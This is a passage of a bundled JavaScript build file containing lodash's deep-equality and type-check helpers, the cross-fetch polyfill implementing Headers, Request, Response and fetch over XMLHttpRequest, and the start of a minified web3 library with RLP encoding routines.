            if (symbolValueOf) return symbolValueOf.call(object) == symbolValueOf.call(other);
    }
    return false;
}
/**
 * A specialized version of `baseIsEqualDeep` for objects with support for
 * partial deep comparisons.
 *
 * @private
 * @param {Object} object The object to compare.
 * @param {Object} other The other object to compare.
 * @param {number} bitmask The bitmask flags. See `baseIsEqual` for more details.
 * @param {Function} customizer The function to customize comparisons.
 * @param {Function} equalFunc The function to determine equivalents of values.
 * @param {Object} stack Tracks traversed `object` and `other` objects.
 * @returns {boolean} Returns `true` if the objects are equivalent, else `false`.
 */ function equalObjects(object, other, bitmask, customizer, equalFunc, stack) {
    var isPartial = bitmask & COMPARE_PARTIAL_FLAG, objProps = getAllKeys(object), objLength = objProps.length, othProps = getAllKeys(other), othLength = othProps.length;
    if (objLength != othLength && !isPartial) return false;
    var index = objLength;
    while(index--){
        var key = objProps[index];
        if (!(isPartial ? key in other : hasOwnProperty.call(other, key))) return false;
    }
    // Assume cyclic values are equal.
    var stacked = stack.get(object);
    if (stacked && stack.get(other)) return stacked == other;
    var result = true;
    stack.set(object, other);
    stack.set(other, object);
    var skipCtor = isPartial;
    while(++index < objLength){
        key = objProps[index];
        var objValue = object[key], othValue = other[key];
        if (customizer) var compared = isPartial ? customizer(othValue, objValue, key, other, object, stack) : customizer(objValue, othValue, key, object, other, stack);
        // Recursively compare objects (susceptible to call stack limits).
        if (!(compared === undefined ? objValue === othValue || equalFunc(objValue, othValue, bitmask, customizer, stack) : compared)) {
            result = false;
            break;
        }
        skipCtor || (skipCtor = key == "constructor");
    }
    if (result && !skipCtor) {
        var objCtor = object.constructor, othCtor = other.constructor;
        // Non `Object` object instances with different constructors are not equal.
        if (objCtor != othCtor && "constructor" in object && "constructor" in other && !(typeof objCtor == "function" && objCtor instanceof objCtor && typeof othCtor == "function" && othCtor instanceof othCtor)) result = false;
    }
    stack["delete"](object);
    stack["delete"](other);
    return result;
}
/**
 * Creates an array of own enumerable property names and symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names and symbols.
 */ function getAllKeys(object) {
    return baseGetAllKeys(object, keys, getSymbols);
}
/**
 * Gets the data for `map`.
 *
 * @private
 * @param {Object} map The map to query.
 * @param {string} key The reference key.
 * @returns {*} Returns the map data.
 */ function getMapData(map, key) {
    var data = map.__data__;
    return isKeyable(key) ? data[typeof key == "string" ? "string" : "hash"] : data.map;
}
/**
 * Gets the native function at `key` of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @param {string} key The key of the method to get.
 * @returns {*} Returns the function if it's native, else `undefined`.
 */ function getNative(object, key) {
    var value = getValue(object, key);
    return baseIsNative(value) ? value : undefined;
}
/**
 * A specialized version of `baseGetTag` which ignores `Symbol.toStringTag` values.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the raw `toStringTag`.
 */ function getRawTag(value) {
    var isOwn = hasOwnProperty.call(value, symToStringTag), tag = value[symToStringTag];
    try {
        value[symToStringTag] = undefined;
        var unmasked = true;
    } catch (e) {}
    var result = nativeObjectToString.call(value);
    if (unmasked) {
        if (isOwn) value[symToStringTag] = tag;
        else delete value[symToStringTag];
    }
    return result;
}
/**
 * Creates an array of the own enumerable symbols of `object`.
 *
 * @private
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of symbols.
 */ var getSymbols = !nativeGetSymbols ? stubArray : function(object) {
    if (object == null) return [];
    object = Object(object);
    return arrayFilter(nativeGetSymbols(object), function(symbol) {
        return propertyIsEnumerable.call(object, symbol);
    });
};
/**
 * Gets the `toStringTag` of `value`.
 *
 * @private
 * @param {*} value The value to query.
 * @returns {string} Returns the `toStringTag`.
 */ var getTag = baseGetTag;
// Fallback for data views, maps, sets, and weak maps in IE 11 and promises in Node.js < 6.
if (DataView && getTag(new DataView(new ArrayBuffer(1))) != dataViewTag || Map && getTag(new Map) != mapTag || Promise && getTag(Promise.resolve()) != promiseTag || Set && getTag(new Set) != setTag || WeakMap && getTag(new WeakMap) != weakMapTag) getTag = function(value) {
    var result = baseGetTag(value), Ctor = result == objectTag ? value.constructor : undefined, ctorString = Ctor ? toSource(Ctor) : "";
    if (ctorString) switch(ctorString){
        case dataViewCtorString:
            return dataViewTag;
        case mapCtorString:
            return mapTag;
        case promiseCtorString:
            return promiseTag;
        case setCtorString:
            return setTag;
        case weakMapCtorString:
            return weakMapTag;
    }
    return result;
};
/**
 * Checks if `value` is a valid array-like index.
 *
 * @private
 * @param {*} value The value to check.
 * @param {number} [length=MAX_SAFE_INTEGER] The upper bounds of a valid index.
 * @returns {boolean} Returns `true` if `value` is a valid index, else `false`.
 */ function isIndex(value, length) {
    length = length == null ? MAX_SAFE_INTEGER : length;
    return !!length && (typeof value == "number" || reIsUint.test(value)) && value > -1 && value % 1 == 0 && value < length;
}
/**
 * Checks if `value` is suitable for use as unique object key.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is suitable, else `false`.
 */ function isKeyable(value) {
    var type = typeof value;
    return type == "string" || type == "number" || type == "symbol" || type == "boolean" ? value !== "__proto__" : value === null;
}
/**
 * Checks if `func` has its source masked.
 *
 * @private
 * @param {Function} func The function to check.
 * @returns {boolean} Returns `true` if `func` is masked, else `false`.
 */ function isMasked(func) {
    return !!maskSrcKey && maskSrcKey in func;
}
/**
 * Checks if `value` is likely a prototype object.
 *
 * @private
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a prototype, else `false`.
 */ function isPrototype(value) {
    var Ctor = value && value.constructor, proto = typeof Ctor == "function" && Ctor.prototype || objectProto;
    return value === proto;
}
/**
 * Converts `value` to a string using `Object.prototype.toString`.
 *
 * @private
 * @param {*} value The value to convert.
 * @returns {string} Returns the converted string.
 */ function objectToString(value) {
    return nativeObjectToString.call(value);
}
/**
 * Converts `func` to its source code.
 *
 * @private
 * @param {Function} func The function to convert.
 * @returns {string} Returns the source code.
 */ function toSource(func) {
    if (func != null) {
        try {
            return funcToString.call(func);
        } catch (e) {}
        try {
            return func + "";
        } catch (e) {}
    }
    return "";
}
/**
 * Performs a
 * [`SameValueZero`](http://ecma-international.org/ecma-262/7.0/#sec-samevaluezero)
 * comparison between two values to determine if they are equivalent.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 * @example
 *
 * var object = { 'a': 1 };
 * var other = { 'a': 1 };
 *
 * _.eq(object, object);
 * // => true
 *
 * _.eq(object, other);
 * // => false
 *
 * _.eq('a', 'a');
 * // => true
 *
 * _.eq('a', Object('a'));
 * // => false
 *
 * _.eq(NaN, NaN);
 * // => true
 */ function eq(value, other) {
    return value === other || value !== value && other !== other;
}
/**
 * Checks if `value` is likely an `arguments` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an `arguments` object,
 *  else `false`.
 * @example
 *
 * _.isArguments(function() { return arguments; }());
 * // => true
 *
 * _.isArguments([1, 2, 3]);
 * // => false
 */ var isArguments = baseIsArguments(function() {
    return arguments;
}()) ? baseIsArguments : function(value) {
    return isObjectLike(value) && hasOwnProperty.call(value, "callee") && !propertyIsEnumerable.call(value, "callee");
};
/**
 * Checks if `value` is classified as an `Array` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an array, else `false`.
 * @example
 *
 * _.isArray([1, 2, 3]);
 * // => true
 *
 * _.isArray(document.body.children);
 * // => false
 *
 * _.isArray('abc');
 * // => false
 *
 * _.isArray(_.noop);
 * // => false
 */ var isArray = Array.isArray;
/**
 * Checks if `value` is array-like. A value is considered array-like if it's
 * not a function and has a `value.length` that's an integer greater than or
 * equal to `0` and less than or equal to `Number.MAX_SAFE_INTEGER`.
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is array-like, else `false`.
 * @example
 *
 * _.isArrayLike([1, 2, 3]);
 * // => true
 *
 * _.isArrayLike(document.body.children);
 * // => true
 *
 * _.isArrayLike('abc');
 * // => true
 *
 * _.isArrayLike(_.noop);
 * // => false
 */ function isArrayLike(value) {
    return value != null && isLength(value.length) && !isFunction(value);
}
/**
 * Checks if `value` is a buffer.
 *
 * @static
 * @memberOf _
 * @since 4.3.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a buffer, else `false`.
 * @example
 *
 * _.isBuffer(new Buffer(2));
 * // => true
 *
 * _.isBuffer(new Uint8Array(2));
 * // => false
 */ var isBuffer = nativeIsBuffer || stubFalse;
/**
 * Performs a deep comparison between two values to determine if they are
 * equivalent.
 *
 * **Note:** This method supports comparing arrays, array buffers, booleans,
 * date objects, error objects, maps, numbers, `Object` objects, regexes,
 * sets, strings, symbols, and typed arrays. `Object` objects are compared
 * by their own, not inherited, enumerable properties. Functions and DOM
 * nodes are compared by strict equality, i.e. `===`.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to compare.
 * @param {*} other The other value to compare.
 * @returns {boolean} Returns `true` if the values are equivalent, else `false`.
 * @example
 *
 * var object = { 'a': 1 };
 * var other = { 'a': 1 };
 *
 * _.isEqual(object, other);
 * // => true
 *
 * object === other;
 * // => false
 */ function isEqual(value, other) {
    return baseIsEqual(value, other);
}
/**
 * Checks if `value` is classified as a `Function` object.
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a function, else `false`.
 * @example
 *
 * _.isFunction(_);
 * // => true
 *
 * _.isFunction(/abc/);
 * // => false
 */ function isFunction(value) {
    if (!isObject(value)) return false;
    // The use of `Object#toString` avoids issues with the `typeof` operator
    // in Safari 9 which returns 'object' for typed arrays and other constructors.
    var tag = baseGetTag(value);
    return tag == funcTag || tag == genTag || tag == asyncTag || tag == proxyTag;
}
/**
 * Checks if `value` is a valid array-like length.
 *
 * **Note:** This method is loosely based on
 * [`ToLength`](http://ecma-international.org/ecma-262/7.0/#sec-tolength).
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a valid length, else `false`.
 * @example
 *
 * _.isLength(3);
 * // => true
 *
 * _.isLength(Number.MIN_VALUE);
 * // => false
 *
 * _.isLength(Infinity);
 * // => false
 *
 * _.isLength('3');
 * // => false
 */ function isLength(value) {
    return typeof value == "number" && value > -1 && value % 1 == 0 && value <= MAX_SAFE_INTEGER;
}
/**
 * Checks if `value` is the
 * [language type](http://www.ecma-international.org/ecma-262/7.0/#sec-ecmascript-language-types)
 * of `Object`. (e.g. arrays, functions, objects, regexes, `new Number(0)`, and `new String('')`)
 *
 * @static
 * @memberOf _
 * @since 0.1.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is an object, else `false`.
 * @example
 *
 * _.isObject({});
 * // => true
 *
 * _.isObject([1, 2, 3]);
 * // => true
 *
 * _.isObject(_.noop);
 * // => true
 *
 * _.isObject(null);
 * // => false
 */ function isObject(value) {
    var type = typeof value;
    return value != null && (type == "object" || type == "function");
}
/**
 * Checks if `value` is object-like. A value is object-like if it's not `null`
 * and has a `typeof` result of "object".
 *
 * @static
 * @memberOf _
 * @since 4.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is object-like, else `false`.
 * @example
 *
 * _.isObjectLike({});
 * // => true
 *
 * _.isObjectLike([1, 2, 3]);
 * // => true
 *
 * _.isObjectLike(_.noop);
 * // => false
 *
 * _.isObjectLike(null);
 * // => false
 */ function isObjectLike(value) {
    return value != null && typeof value == "object";
}
/**
 * Checks if `value` is classified as a typed array.
 *
 * @static
 * @memberOf _
 * @since 3.0.0
 * @category Lang
 * @param {*} value The value to check.
 * @returns {boolean} Returns `true` if `value` is a typed array, else `false`.
 * @example
 *
 * _.isTypedArray(new Uint8Array);
 * // => true
 *
 * _.isTypedArray([]);
 * // => false
 */ var isTypedArray = nodeIsTypedArray ? baseUnary(nodeIsTypedArray) : baseIsTypedArray;
/**
 * Creates an array of the own enumerable property names of `object`.
 *
 * **Note:** Non-object values are coerced to objects. See the
 * [ES spec](http://ecma-international.org/ecma-262/7.0/#sec-object.keys)
 * for more details.
 *
 * @static
 * @since 0.1.0
 * @memberOf _
 * @category Object
 * @param {Object} object The object to query.
 * @returns {Array} Returns the array of property names.
 * @example
 *
 * function Foo() {
 *   this.a = 1;
 *   this.b = 2;
 * }
 *
 * Foo.prototype.c = 3;
 *
 * _.keys(new Foo);
 * // => ['a', 'b'] (iteration order is not guaranteed)
 *
 * _.keys('hi');
 * // => ['0', '1']
 */ function keys(object) {
    return isArrayLike(object) ? arrayLikeKeys(object) : baseKeys(object);
}
/**
 * This method returns a new empty array.
 *
 * @static
 * @memberOf _
 * @since 4.13.0
 * @category Util
 * @returns {Array} Returns the new empty array.
 * @example
 *
 * var arrays = _.times(2, _.stubArray);
 *
 * console.log(arrays);
 * // => [[], []]
 *
 * console.log(arrays[0] === arrays[1]);
 * // => false
 */ function stubArray() {
    return [];
}
/**
 * This method returns `false`.
 *
 * @static
 * @memberOf _
 * @since 4.13.0
 * @category Util
 * @returns {boolean} Returns `false`.
 * @example
 *
 * _.times(2, _.stubFalse);
 * // => [false, false]
 */ function stubFalse() {
    return false;
}
module.exports = isEqual;

});

parcelRequire.register("R5nvG", function(module, exports) {
var global = typeof self !== "undefined" ? self : this;
var __self__ = function() {
    function F() {
        this.fetch = false;
        this.DOMException = global.DOMException;
    }
    F.prototype = global;
    return new F();
}();
(function(self1) {
    var irrelevant = function(exports1) {
        var support = {
            searchParams: "URLSearchParams" in self1,
            iterable: "Symbol" in self1 && "iterator" in Symbol,
            blob: "FileReader" in self1 && "Blob" in self1 && function() {
                try {
                    new Blob();
                    return true;
                } catch (e) {
                    return false;
                }
            }(),
            formData: "FormData" in self1,
            arrayBuffer: "ArrayBuffer" in self1
        };
        function isDataView(obj) {
            return obj && DataView.prototype.isPrototypeOf(obj);
        }
        if (support.arrayBuffer) {
            var viewClasses = [
                "[object Int8Array]",
                "[object Uint8Array]",
                "[object Uint8ClampedArray]",
                "[object Int16Array]",
                "[object Uint16Array]",
                "[object Int32Array]",
                "[object Uint32Array]",
                "[object Float32Array]",
                "[object Float64Array]"
            ];
            var isArrayBufferView = ArrayBuffer.isView || function(obj) {
                return obj && viewClasses.indexOf(Object.prototype.toString.call(obj)) > -1;
            };
        }
        function normalizeName(name) {
            if (typeof name !== "string") name = String(name);
            if (/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(name)) throw new TypeError("Invalid character in header field name");
            return name.toLowerCase();
        }
        function normalizeValue(value) {
            if (typeof value !== "string") value = String(value);
            return value;
        }
        // Build a destructive iterator for the value list
        function iteratorFor(items) {
            var iterator = {
                next: function() {
                    var value = items.shift();
                    return {
                        done: value === undefined,
                        value: value
                    };
                }
            };
            if (support.iterable) iterator[Symbol.iterator] = function() {
                return iterator;
            };
            return iterator;
        }
        function Headers(headers) {
            this.map = {};
            if (headers instanceof Headers) headers.forEach(function(value, name) {
                this.append(name, value);
            }, this);
            else if (Array.isArray(headers)) headers.forEach(function(header) {
                this.append(header[0], header[1]);
            }, this);
            else if (headers) Object.getOwnPropertyNames(headers).forEach(function(name) {
                this.append(name, headers[name]);
            }, this);
        }
        Headers.prototype.append = function(name, value) {
            name = normalizeName(name);
            value = normalizeValue(value);
            var oldValue = this.map[name];
            this.map[name] = oldValue ? oldValue + ", " + value : value;
        };
        Headers.prototype["delete"] = function(name) {
            delete this.map[normalizeName(name)];
        };
        Headers.prototype.get = function(name) {
            name = normalizeName(name);
            return this.has(name) ? this.map[name] : null;
        };
        Headers.prototype.has = function(name) {
            return this.map.hasOwnProperty(normalizeName(name));
        };
        Headers.prototype.set = function(name, value) {
            this.map[normalizeName(name)] = normalizeValue(value);
        };
        Headers.prototype.forEach = function(callback, thisArg) {
            for(var name in this.map)if (this.map.hasOwnProperty(name)) callback.call(thisArg, this.map[name], name, this);
        };
        Headers.prototype.keys = function() {
            var items = [];
            this.forEach(function(value, name) {
                items.push(name);
            });
            return iteratorFor(items);
        };
        Headers.prototype.values = function() {
            var items = [];
            this.forEach(function(value) {
                items.push(value);
            });
            return iteratorFor(items);
        };
        Headers.prototype.entries = function() {
            var items = [];
            this.forEach(function(value, name) {
                items.push([
                    name,
                    value
                ]);
            });
            return iteratorFor(items);
        };
        if (support.iterable) Headers.prototype[Symbol.iterator] = Headers.prototype.entries;
        function consumed(body) {
            if (body.bodyUsed) return Promise.reject(new TypeError("Already read"));
            body.bodyUsed = true;
        }
        function fileReaderReady(reader) {
            return new Promise(function(resolve, reject) {
                reader.onload = function() {
                    resolve(reader.result);
                };
                reader.onerror = function() {
                    reject(reader.error);
                };
            });
        }
        function readBlobAsArrayBuffer(blob) {
            var reader = new FileReader();
            var promise = fileReaderReady(reader);
            reader.readAsArrayBuffer(blob);
            return promise;
        }
        function readBlobAsText(blob) {
            var reader = new FileReader();
            var promise = fileReaderReady(reader);
            reader.readAsText(blob);
            return promise;
        }
        function readArrayBufferAsText(buf) {
            var view = new Uint8Array(buf);
            var chars = new Array(view.length);
            for(var i = 0; i < view.length; i++)chars[i] = String.fromCharCode(view[i]);
            return chars.join("");
        }
        function bufferClone(buf) {
            if (buf.slice) return buf.slice(0);
            else {
                var view = new Uint8Array(buf.byteLength);
                view.set(new Uint8Array(buf));
                return view.buffer;
            }
        }
        function Body() {
            this.bodyUsed = false;
            this._initBody = function(body) {
                this._bodyInit = body;
                if (!body) this._bodyText = "";
                else if (typeof body === "string") this._bodyText = body;
                else if (support.blob && Blob.prototype.isPrototypeOf(body)) this._bodyBlob = body;
                else if (support.formData && FormData.prototype.isPrototypeOf(body)) this._bodyFormData = body;
                else if (support.searchParams && URLSearchParams.prototype.isPrototypeOf(body)) this._bodyText = body.toString();
                else if (support.arrayBuffer && support.blob && isDataView(body)) {
                    this._bodyArrayBuffer = bufferClone(body.buffer);
                    // IE 10-11 can't handle a DataView body.
                    this._bodyInit = new Blob([
                        this._bodyArrayBuffer
                    ]);
                } else if (support.arrayBuffer && (ArrayBuffer.prototype.isPrototypeOf(body) || isArrayBufferView(body))) this._bodyArrayBuffer = bufferClone(body);
                else this._bodyText = body = Object.prototype.toString.call(body);
                if (!this.headers.get("content-type")) {
                    if (typeof body === "string") this.headers.set("content-type", "text/plain;charset=UTF-8");
                    else if (this._bodyBlob && this._bodyBlob.type) this.headers.set("content-type", this._bodyBlob.type);
                    else if (support.searchParams && URLSearchParams.prototype.isPrototypeOf(body)) this.headers.set("content-type", "application/x-www-form-urlencoded;charset=UTF-8");
                }
            };
            if (support.blob) {
                this.blob = function() {
                    var rejected = consumed(this);
                    if (rejected) return rejected;
                    if (this._bodyBlob) return Promise.resolve(this._bodyBlob);
                    else if (this._bodyArrayBuffer) return Promise.resolve(new Blob([
                        this._bodyArrayBuffer
                    ]));
                    else if (this._bodyFormData) throw new Error("could not read FormData body as blob");
                    else return Promise.resolve(new Blob([
                        this._bodyText
                    ]));
                };
                this.arrayBuffer = function() {
                    if (this._bodyArrayBuffer) return consumed(this) || Promise.resolve(this._bodyArrayBuffer);
                    else return this.blob().then(readBlobAsArrayBuffer);
                };
            }
            this.text = function() {
                var rejected = consumed(this);
                if (rejected) return rejected;
                if (this._bodyBlob) return readBlobAsText(this._bodyBlob);
                else if (this._bodyArrayBuffer) return Promise.resolve(readArrayBufferAsText(this._bodyArrayBuffer));
                else if (this._bodyFormData) throw new Error("could not read FormData body as text");
                else return Promise.resolve(this._bodyText);
            };
            if (support.formData) this.formData = function() {
                return this.text().then(decode);
            };
            this.json = function() {
                return this.text().then(JSON.parse);
            };
            return this;
        }
        // HTTP methods whose capitalization should be normalized
        var methods = [
            "DELETE",
            "GET",
            "HEAD",
            "OPTIONS",
            "POST",
            "PUT"
        ];
        function normalizeMethod(method) {
            var upcased = method.toUpperCase();
            return methods.indexOf(upcased) > -1 ? upcased : method;
        }
        function Request(input, options) {
            options = options || {};
            var body = options.body;
            if (input instanceof Request) {
                if (input.bodyUsed) throw new TypeError("Already read");
                this.url = input.url;
                this.credentials = input.credentials;
                if (!options.headers) this.headers = new Headers(input.headers);
                this.method = input.method;
                this.mode = input.mode;
                this.signal = input.signal;
                if (!body && input._bodyInit != null) {
                    body = input._bodyInit;
                    input.bodyUsed = true;
                }
            } else this.url = String(input);
            this.credentials = options.credentials || this.credentials || "same-origin";
            if (options.headers || !this.headers) this.headers = new Headers(options.headers);
            this.method = normalizeMethod(options.method || this.method || "GET");
            this.mode = options.mode || this.mode || null;
            this.signal = options.signal || this.signal;
            this.referrer = null;
            if ((this.method === "GET" || this.method === "HEAD") && body) throw new TypeError("Body not allowed for GET or HEAD requests");
            this._initBody(body);
        }
        Request.prototype.clone = function() {
            return new Request(this, {
                body: this._bodyInit
            });
        };
        function decode(body) {
            var form = new FormData();
            body.trim().split("&").forEach(function(bytes) {
                if (bytes) {
                    var split = bytes.split("=");
                    var name = split.shift().replace(/\+/g, " ");
                    var value = split.join("=").replace(/\+/g, " ");
                    form.append(decodeURIComponent(name), decodeURIComponent(value));
                }
            });
            return form;
        }
        function parseHeaders(rawHeaders) {
            var headers = new Headers();
            // Replace instances of \r\n and \n followed by at least one space or horizontal tab with a space
            // https://tools.ietf.org/html/rfc7230#section-3.2
            var preProcessedHeaders = rawHeaders.replace(/\r?\n[\t ]+/g, " ");
            preProcessedHeaders.split(/\r?\n/).forEach(function(line) {
                var parts = line.split(":");
                var key = parts.shift().trim();
                if (key) {
                    var value = parts.join(":").trim();
                    headers.append(key, value);
                }
            });
            return headers;
        }
        Body.call(Request.prototype);
        function Response(bodyInit, options) {
            if (!options) options = {};
            this.type = "default";
            this.status = options.status === undefined ? 200 : options.status;
            this.ok = this.status >= 200 && this.status < 300;
            this.statusText = "statusText" in options ? options.statusText : "OK";
            this.headers = new Headers(options.headers);
            this.url = options.url || "";
            this._initBody(bodyInit);
        }
        Body.call(Response.prototype);
        Response.prototype.clone = function() {
            return new Response(this._bodyInit, {
                status: this.status,
                statusText: this.statusText,
                headers: new Headers(this.headers),
                url: this.url
            });
        };
        Response.error = function() {
            var response = new Response(null, {
                status: 0,
                statusText: ""
            });
            response.type = "error";
            return response;
        };
        var redirectStatuses = [
            301,
            302,
            303,
            307,
            308
        ];
        Response.redirect = function(url, status) {
            if (redirectStatuses.indexOf(status) === -1) throw new RangeError("Invalid status code");
            return new Response(null, {
                status: status,
                headers: {
                    location: url
                }
            });
        };
        exports1.DOMException = self1.DOMException;
        try {
            new exports1.DOMException();
        } catch (err) {
            exports1.DOMException = function(message, name) {
                this.message = message;
                this.name = name;
                var error = Error(message);
                this.stack = error.stack;
            };
            exports1.DOMException.prototype = Object.create(Error.prototype);
            exports1.DOMException.prototype.constructor = exports1.DOMException;
        }
        function fetch(input, init) {
            return new Promise(function(resolve, reject) {
                var request = new Request(input, init);
                if (request.signal && request.signal.aborted) return reject(new exports1.DOMException("Aborted", "AbortError"));
                var xhr = new XMLHttpRequest();
                function abortXhr() {
                    xhr.abort();
                }
                xhr.onload = function() {
                    var options = {
                        status: xhr.status,
                        statusText: xhr.statusText,
                        headers: parseHeaders(xhr.getAllResponseHeaders() || "")
                    };
                    options.url = "responseURL" in xhr ? xhr.responseURL : options.headers.get("X-Request-URL");
                    var body = "response" in xhr ? xhr.response : xhr.responseText;
                    resolve(new Response(body, options));
                };
                xhr.onerror = function() {
                    reject(new TypeError("Network request failed"));
                };
                xhr.ontimeout = function() {
                    reject(new TypeError("Network request failed"));
                };
                xhr.onabort = function() {
                    reject(new exports1.DOMException("Aborted", "AbortError"));
                };
                xhr.open(request.method, request.url, true);
                if (request.credentials === "include") xhr.withCredentials = true;
                else if (request.credentials === "omit") xhr.withCredentials = false;
                if ("responseType" in xhr && support.blob) xhr.responseType = "blob";
                request.headers.forEach(function(value, name) {
                    xhr.setRequestHeader(name, value);
                });
                if (request.signal) {
                    request.signal.addEventListener("abort", abortXhr);
                    xhr.onreadystatechange = function() {
                        // DONE (success or failure)
                        if (xhr.readyState === 4) request.signal.removeEventListener("abort", abortXhr);
                    };
                }
                xhr.send(typeof request._bodyInit === "undefined" ? null : request._bodyInit);
            });
        }
        fetch.polyfill = true;
        if (!self1.fetch) {
            self1.fetch = fetch;
            self1.Headers = Headers;
            self1.Request = Request;
            self1.Response = Response;
        }
        exports1.Headers = Headers;
        exports1.Request = Request;
        exports1.Response = Response;
        exports1.fetch = fetch;
        Object.defineProperty(exports1, "__esModule", {
            value: true
        });
        return exports1;
    }({});
})(__self__);
__self__.fetch.ponyfill = true;
// Remove "polyfill" property added by whatwg-fetch
delete __self__.fetch.polyfill;
// Choose between native implementation (global) or custom implementation (__self__)
// var ctx = global.fetch ? global : __self__;
var ctx = __self__; // this line disable service worker support temporarily
exports = ctx.fetch // To enable: import fetch from 'cross-fetch'
;
exports.default = ctx.fetch // For TypeScript consumers without esModuleInterop.
;
exports.fetch = ctx.fetch // To enable: import {fetch} from 'cross-fetch'
;
exports.Headers = ctx.Headers;
exports.Request = ctx.Request;
exports.Response = ctx.Response;
module.exports = exports;

});

parcelRequire.register("yQvku", function(module, exports) {

module.exports = import("./" + (parcelRequire("27Lyk")).resolve("jicEo")).then(()=>parcelRequire("lUOEJ"));

});

var $2c4ca49181ee4a21$exports = {};
/*! For license information please see web3.min.js.LICENSE.txt */ !function(e, t) {
    $2c4ca49181ee4a21$exports = t();
}($2c4ca49181ee4a21$exports, ()=>(()=>{
        var e = {
            7256: (e, t)=>{
                "use strict";
                function r(e) {
                    if (Array.isArray(e)) {
                        const t = [];
                        let n = 0;
                        for(let i = 0; i < e.length; i++){
                            const o = r(e[i]);
                            t.push(o), n += o.length;
                        }
                        return h(o(n, 192), ...t);
                    }
                    const t = g(e);
                    return 1 === t.length && t[0] < 128 ? t : h(o(t.length, 128), t);
                }
                function n(e, t, r) {
                    if (r > e.length) throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");
                    return e.slice(t, r);
                }
                function i(e) {
                    if (0 === e[0]) throw new Error("invalid RLP: extra zeros");
                    return l(c(e));
                }
                function o(e, t) {
                    if (e < 56) return Uint8Array.from([
                        e + t
                    ]);
                    const r = p(e), n = p(t + 55 + r.length / 2);
                    return Uint8Array.from(d(n + r));
                }
                function s(e, t = !1) {
                    if (null == e || 0 === e.length) return Uint8Array.from([]);
                    const r = a(g(e));
                    if (t) return r;
                    if (0 !== r.remainder.length) throw new Error("invalid RLP: remainder must be zero");
                    return r.data;
                }
                function a(e) {
                    let t, r, o, s, u;
                    const c = [], l = e[0];
                    if (l <= 127) return {
                        data: e.slice(0, 1),
                        remainder: e.slice(1)
                    };
                    if (l <= 183) {
                        if (t = l - 127, o = 128 === l ? Uint8Array.from([]) : n(e, 1, t), 2 === t && o[0] < 128) throw new Error("invalid RLP encoding: invalid prefix, single byte < 0x80 are not prefixed");
                        return {
                            data: o,
                            remainder: e.slice(t)
                        };
                    }
                    if (l <= 191) {
                        if (r = l - 182, e.length - 1 < r) throw new Error("invalid RLP: not enough bytes for string length");
                        if (t = i(n(e, 1, r)), t <= 55) throw new Error("invalid RLP: expected string length to be greater than 55");
                        return o = n(e, r, t + r), {
                            data: o,
                            remainder: e.slice(t + r)
                        };
                    }
                    if (l <= 247) {
                        for(t = l - 191, s = n(e, 1, t); s.length;)u = a(s), c.push(u.data), s = u.remainder;
                        return {
                            data: c,
                            remainder: e.slice(t)
                        };
                    }
                    {
                        if (r = l - 246, t = i(n(e, 1, r)), t < 56) throw new Error("invalid RLP: encoded list too short");
                        const o = r + t;
                        if (o > e.length) throw new Error("invalid RLP: total length is larger than the data");
                        for(s = n(e, r, o); s.length;)u = a(s), c.push(u.data), s = u.remainder;
                        return {
                            data: c,
                            remainder: e.slice(o)
                        };
                    }
                }
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.RLP = t.utils = t.decode = t.encode = void 0, t.encode = r, t.decode = s;
                const u = Array.from({
                    length: 256
                }, (e, t)=>t.toString(16).padStart(2, "0"));
                function c(e) {
                    let t = "";
                    for(let r = 0; r < e.length; r++)t += u[e[r]];
                    return t;
                }
                function l(e) {
                    const t = Number.parseInt(e, 16);
                    if (Number.isNaN(t)) throw new Error("Invalid byte sequence");
                    return t;
                }
                function d(e) {
                    if ("string" != typeof e) throw new TypeError("hexToBytes: expected string, got " + typeof e);
                    if (e.length % 2) throw new Error("hexToBytes: received invalid unpadded hex");
                    const t = new Uint8Array(e.length / 2);
                    for(let r = 0; r < t.length; r++){
                        const n = 2 * r;
                        t[r] = l(e.slice(n, n + 2));
                    }
                    return t;
                }
                function h(...e) {
                    if (1 === e.length) return e[0];
                    const t = e.reduce((e, t)=>e + t.length, 0), r = new Uint8Array(t);
                    for(let t = 0, n = 0; t < e.length; t++){
                        const i = e[t];
                        r.set(i, n), n += i.length;
                    }
                    return r;
                }
                function f(e) {
                    return (new TextEncoder).encode(e);
                }
                function p(e) {
                    if (e < 0) throw new Error("Invalid integer as argument, must be unsigned!");
                    const t = e.toString(16);
                    return t.length % 2 ? `0${t}` : t;
                }
                function m(e) {
                    return e.length >= 2 && "0" === e[0] && "x" === e[1];
                }
                function g(e) {
                    if (e instanceof Uint8Array) return e;
                    if ("string" == typeof e) return m(e) ? d((t = "string" != typeof (r = e) ? r : m(r) ? r.slice(2) : r).length % 2 ? `0${t}` : t) : f(e);
                    var t, r;
